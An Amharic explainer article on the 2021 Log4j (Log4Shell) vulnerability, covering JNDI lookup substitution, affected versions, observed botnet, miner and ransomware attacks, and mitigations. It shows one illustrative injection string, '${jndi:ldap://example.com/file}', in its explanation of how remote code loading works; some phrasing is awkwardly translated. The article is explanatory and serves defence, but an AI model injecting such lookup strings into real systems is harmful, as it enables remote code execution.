ዝርዝር ሁኔታ[ደብቅ][አሳይ]
እ.ኤ.አ. በኖቬምበር 2021 መገባደጃ ላይ፣ ለሳይበር ደህንነት ትልቅ ስጋት ደርሰናል። ይህ ብዝበዛ በዓለም ዙሪያ በሚሊዮኖች የሚቆጠሩ የኮምፒተር ስርዓቶችን ሊጎዳ ይችላል።
ይህ በLog4j ተጋላጭነት ላይ እና በቸልታ የታየ የዲዛይን ችግር ከ90% በላይ የአለም የኮምፒዩተር አገልግሎቶችን ለማጥቃት እንዴት እንደቀረ መመሪያ ነው።
Apache Log4j በአፓቼ ሶፍትዌር ፋውንዴሽን የተገነባ ክፍት ምንጭ ጃቫ ላይ የተመሠረተ የምዝግብ ማስታወሻ መገልገያ ነው። በ2001 መጀመሪያ ላይ በሴኪ ጉሉ የተፃፈው፣ አሁን የ Apache Logging Services አካል የሆነው፣ የ Apache ሶፍትዌር ፋውንዴሽን ፕሮጀክት ነው።
በአለም ዙሪያ ያሉ ኩባንያዎች በመተግበሪያዎቻቸው ላይ መግባትን ለማስቻል Log4j ላይብረሪ ይጠቀማሉ። እንደ እውነቱ ከሆነ የጃቫ ቤተ-መጽሐፍት በሁሉም ቦታ የሚገኝ ነው, በአማዞን, ማይክሮሶፍት, ጎግል እና ሌሎች መተግበሪያዎች ውስጥ ሊያገኙት ይችላሉ.
የቤተ መፃህፍቱ ታዋቂነት በኮዱ ውስጥ ሊኖር የሚችል ጉድለት በሚሊዮን የሚቆጠሩ ኮምፒውተሮችን ለጠለፋ ክፍት ያደርገዋል ማለት ነው። በኖቬምበር 24፣ 2021፣ አ የደመና ደህንነት በአሊባባ ውስጥ የሚሠራ ተመራማሪ አንድ አስከፊ ጉድለት አገኘ.
የLog4j ተጋላጭነት፣ እንዲሁም Log4Shell በመባልም የሚታወቀው፣ ከ2013 ጀምሮ ሳይስተዋል ቆይቷል። ተጋላጭነቱ ተንኮል-አዘል ተዋናዮች Log4j በሚሄዱ የተጎዱ ስርዓቶች ላይ ኮድ እንዲያሄዱ አስችሏቸዋል። በዲሴምበር 9፣ 2021 በይፋ ተገለጠ
የኢንዱስትሪ ባለሙያዎች Log4Shell ጉድለት ብለው ይጠሩታል። የቅርብ ጊዜ ትውስታ ውስጥ ትልቁ ተጋላጭነት.
የተጋላጭነቱ ከታተመ በሳምንቱ ውስጥ፣ የሳይበር ደህንነት ቡድኖች በሚሊዮን የሚቆጠሩ ጥቃቶችን አግኝተዋል። አንዳንድ ተመራማሪዎች በደቂቃ ከመቶ በላይ ጥቃቶችን አስተውለዋል።
እንዴት ነው የሚሰራው?
Log4Shell ለምን በጣም አደገኛ እንደሆነ ለመረዳት ምን ማድረግ እንደሚችል መረዳት አለብን።
የLog4Shell ተጋላጭነት የዘፈቀደ ኮድ አፈፃፀምን ይፈቅዳል፣ይህም በመሠረቱ አንድ አጥቂ ማንኛውንም ትዕዛዝ ወይም ኮድ በታለመው ማሽን ላይ ማሄድ ይችላል።
ይህንን እንዴት ይፈጽማል?
በመጀመሪያ፣ JNDI ምን እንደሆነ መረዳት አለብን።
የJava Naming and Directory Interface (JNDI) የጃቫ ፕሮግራሞች መረጃን እና ሃብቶችን በስም እንዲፈልጉ እና እንዲፈልጉ የሚያስችል የጃቫ አገልግሎት ነው። እነዚህ የማውጫ አገልግሎቶች አስፈላጊ ናቸው ምክንያቱም ገንቢዎች አፕሊኬሽኖችን በሚፈጥሩበት ጊዜ በቀላሉ ለማጣቀሻነት የተደራጁ መዝገቦችን ያቀርባሉ።
JNDI አንድ የተወሰነ ማውጫ ለመድረስ የተለያዩ ፕሮቶኮሎችን መጠቀም ይችላል። ከእነዚህ ፕሮቶኮሎች አንዱ ቀላል ክብደት ያለው ማውጫ መዳረሻ ፕሮቶኮል፣ ወይም ኤልዲኤፒ ነው።
ሕብረቁምፊ ሲያስገቡ፣ log4j የቅጹን መግለጫዎች ሲያጋጥሙ የሕብረቁምፊ ምትክን ያከናውናል ${prefix:name}
.
ለምሳሌ, Text: ${java:version}
እንደ ጽሑፍ ሊመዘገብ ይችላል፡ የጃቫ ስሪት 1.8.0_65። እንደነዚህ ዓይነቶቹ መተኪያዎች የተለመዱ ናቸው.
የመሳሰሉ አባባሎችም ሊኖረን ይችላል። Text: ${jndi:ldap://example.com/file}
በኤልዲኤፒ ፕሮቶኮል በኩል የጃቫን ነገር ከዩአርኤል ለመጫን የJNDI ሲስተም ይጠቀማል።
ይሄ ከዚያ ዩአርኤል የሚመጣውን ውሂብ ወደ ማሽኑ በትክክል ይጭናል። ማንኛውም ጠላፊ ተንኮል-አዘል ኮድ በይፋዊ ዩአርኤል ላይ ማስተናገድ እና Log4j ን ተጠቅመው ለመግባት ማሽኖችን መጠበቅ ይችላል።
የምዝግብ ማስታወሻዎች ይዘቶች በተጠቃሚ ቁጥጥር የሚደረግባቸው መረጃዎች ስላሏቸው ጠላፊዎች የሚቆጣጠሩትን የኤልዲኤፒ አገልጋዮችን የሚያመለክቱ የራሳቸውን JNDI ማጣቀሻዎች ማስገባት ይችላሉ። እነዚህ የኤልዲኤፒ አገልጋዮች JNDI በተጋላጭነት ሊፈጽምባቸው በሚችሉ ተንኮል አዘል የጃቫ ነገሮች የተሞሉ ሊሆኑ ይችላሉ።
ይህን የከፋ የሚያደርገው አፕሊኬሽኑ የአገልጋይ ወገን ወይም የደንበኛ ወገን አፕሊኬሽን ከሆነ ምንም ለውጥ አያመጣም።
ሎገሪው የአጥቂውን ተንኮል-አዘል ኮድ የሚያነብበት መንገድ እስካለ ድረስ አፕሊኬሽኑ አሁንም ለመጠቀም ክፍት ነው።
ማን ነው ተጽዕኖ ያለው?
ተጋላጭነቱ ሁሉንም APache Log4j የሚጠቀሙ ስርዓቶችን እና አገልግሎቶችን ይነካል፣ ከ 2.0 ስሪቶች ጋር እስከ 2.14.1 ጨምሮ።
በርካታ የደህንነት ባለሙያዎች ተጋላጭነቱ ጃቫን በሚጠቀሙ በርካታ መተግበሪያዎች ላይ ተጽዕኖ እንደሚያሳድር ይመክራሉ።
ጉድለቱ በመጀመሪያ የተገኘዉ የማይክሮሶፍት ባለቤትነት በያዘዉ Minecraft የቪዲዮ ጨዋታ ላይ ነዉ። ማይክሮሶፍት ተጠቃሚዎቻቸውን ማንኛውንም አደጋ ለመከላከል የጃቫ እትም Minecraft ሶፍትዌርን እንዲያሻሽሉ አሳስቧል።
ጄን ኢስተርሊ፣ የሳይበር ደህንነት እና መሠረተ ልማት ደህንነት ኤጀንሲ (ሲአይኤ) ዳይሬክተር እንዳሉት ሻጮች ዋና ኃላፊነት የመጨረሻ ተጠቃሚዎች ይህን ተጋላጭነት ከሚጠቀሙ ተንኮል አዘል ተዋናዮች ለመከላከል።
"አቅራቢዎች እንዲሁ የመጨረሻ ተጠቃሚዎች ምርታቸው ይህን ተጋላጭነት እንደያዘ እና ለሶፍትዌር ማሻሻያዎች ቅድሚያ መስጠት እንዳለበት እንዲያውቁ ከደንበኞቻቸው ጋር መገናኘት አለባቸው።"
ጥቃቶቹ ከወዲሁ መጀመራቸው ተነግሯል። የሳይበር ሴኪዩሪቲ ሶፍትዌሮችን የሚያቀርበው ሳይማንቴክ የተለያዩ የጥቃት ጥያቄዎችን ተመልክቷል።
ተመራማሪዎች ያገኟቸው የጥቃት ዓይነቶች አንዳንድ ምሳሌዎች እነሆ፡-
- botnets
ቦትኔትስ በአንድ አጥቂ አካል ቁጥጥር ስር ያሉ የኮምፒውተሮች ኔትወርክ ነው። የ DDoS ጥቃቶችን ለመፈጸም፣ መረጃ ለመስረቅ እና ሌሎች ማጭበርበሮችን ያግዛሉ። ተመራማሪዎች Muhstik botnet ከLog4j ብዝበዛ በወረዱ የሼል ስክሪፕቶች ውስጥ ተመልክተዋል።
- XMRig ማዕድን ትሮጃን
XMRig የ Monero token ማዕድን ለማውጣት ሲፒዩዎችን የሚጠቀም የክሪፕቶ ምንጭ ፈንጂ ነው። የሳይበር ወንጀለኞች XMRigን በሰዎች መሳሪያዎች ላይ መጫን ይችላሉ ስለዚህም የማቀናበር ሃይላቸውን ሳያውቁ መጠቀም ይችላሉ።
- Khonsari Ransomware
Ransomware ለማመልከት የተነደፈ የማልዌር አይነትን ያመለክታል ፋይሎችን ማመስጠር በኮምፒውተር ላይ. ከዚያም አጥቂዎች የተመሰጠሩትን ፋይሎች መልሶ ለማግኘት ክፍያ ሊጠይቁ ይችላሉ። ተመራማሪዎች በ Log4Shell ጥቃቶች ውስጥ Khonsari ransomware አግኝተዋል። የዊንዶውስ አገልጋዮችን ኢላማ ያደርጋሉ እና የ NET ማዕቀፍን ይጠቀማሉ።
ቀጥሎ ምን ይሆናል?
በLog4J ተጋላጭነት የተፈጠረውን ትርምስ ለማስተካከል ወራት ወይም ምናልባትም ዓመታት ሊወስድ እንደሚችል ባለሙያዎች ይተነብያሉ።
ይህ ሂደት እያንዳንዱን የተጎዳውን ስርዓት በተለጠፈ ስሪት ማዘመንን ያካትታል። ምንም እንኳን እነዚህ ሁሉ ስርዓቶች የተስተካከሉ ቢሆኑም፣ ሰርጎ ገቦች ቀድሞውንም ሰርቨሮች ለጥቃት ክፍት መሆናቸውን በመስኮት ላይ የጨመሩት የጓሮ በር ስጋት አሁንም አለ።
ብዙ መፍትሄዎች እና ቅነሳዎች ትግበራዎች በዚህ ስህተት እንዳይበዘብዙ ለመከላከል አለ። አዲሱ Log4j ስሪት 2.15.0-rc1 ይህን ተጋላጭነት ለመቀነስ የተለያዩ ቅንብሮችን ቀይሯል።
JNDIን የሚጠቀሙ ሁሉም ባህሪያት በነባሪነት ይሰናከላሉ እና የርቀት ፍለጋዎችም እንዲሁ ተገድበዋል። በእርስዎ Log4j ማዋቀር ላይ የመፈለጊያ ባህሪን ማሰናከል ሊደረጉ የሚችሉ ብዝበዛዎችን አደጋ ለመቀነስ ይረዳል።
ከ Log4j ውጪ፣ ክፍት ምንጭ ብዝበዛዎችን ለመከላከል አሁንም ሰፊ እቅድ ያስፈልጋል።
በግንቦት መጀመሪያ ላይ ዋይት ሀውስ አንድ የስራ አመራር ትዕዛዝ ብሔራዊ የሳይበር ደህንነትን ለማሻሻል ያለመ። ለሶፍትዌር ቢል ኦፍ ማቴሪያሎች (SBOM) አቅርቦትን አካትቷል እሱም በመሠረቱ መደበኛ ሰነድ የሆነውን ማመልከቻውን ለመገንባት የሚያስፈልጉትን እያንዳንዱን እቃዎች ዝርዝር ይዟል።
ይህ እንደ የ ክፍት ምንጭ ለልማት ጥቅም ላይ የሚውሉ ፓኬጆች፣ ጥገኞች እና ኤፒአይዎች። ምንም እንኳን የኤስቢኤምኤስ ሀሳብ ግልፅነት የሚረዳ ቢሆንም፣ በእርግጥ ሸማቹን ይረዳል ወይ?
ጥገኝነቶችን ማሻሻል በጣም ብዙ ጣጣ ሊሆን ይችላል። ኩባንያዎች አማራጭ ፓኬጆችን ለማግኘት ተጨማሪ ጊዜን ከማጥፋት ይልቅ ማንኛውንም ቅጣት ለመክፈል መምረጥ ይችላሉ። ምናልባት እነዚህ ኤስ.ቢ.ኤም.ዎች ጠቃሚ ሊሆኑ የሚችሉት የእነሱ ከሆነ ብቻ ነው። ወሰን ተጨማሪ የተገደበ ነው.
መደምደሚያ
የ Log4j ጉዳይ ለድርጅቶች ቴክኒካዊ ችግር ብቻ አይደለም.
የቢዝነስ መሪዎች አገልጋዮቻቸው፣ ምርቶቻቸው ወይም አገልግሎቶቻቸው እራሳቸው በማያቆዩት ኮድ ላይ ሲመሰረቱ ሊከሰቱ የሚችሉ ስጋቶችን ማወቅ አለባቸው።
በክፍት ምንጭ እና በሶስተኛ ወገን መተግበሪያዎች ላይ መተማመን ሁልጊዜ ከተወሰነ አደጋ ጋር ይመጣል። አዳዲስ ስጋቶች ወደ ብርሃን ከመምጣታቸው በፊት ኩባንያዎች የአደጋ መከላከያ ስልቶችን መስራት አለባቸው።
አብዛኛው ድረ-ገጽ በአለም ዙሪያ በሺዎች በሚቆጠሩ በጎ ፍቃደኞች በተያዘ የክፍት ምንጭ ሶፍትዌር ላይ የተመሰረተ ነው።
ድሩን ደህንነቱ የተጠበቀ ቦታ ማድረግ ከፈለግን መንግስታት እና ኮርፖሬሽኖች ክፍት ምንጭ ጥረቶች እና እንደ የሳይበር ደህንነት ኤጀንሲዎች የገንዘብ ድጋፍ ማድረግ አለባቸው ። ሲአይኤስ.
መልስ ይስጡ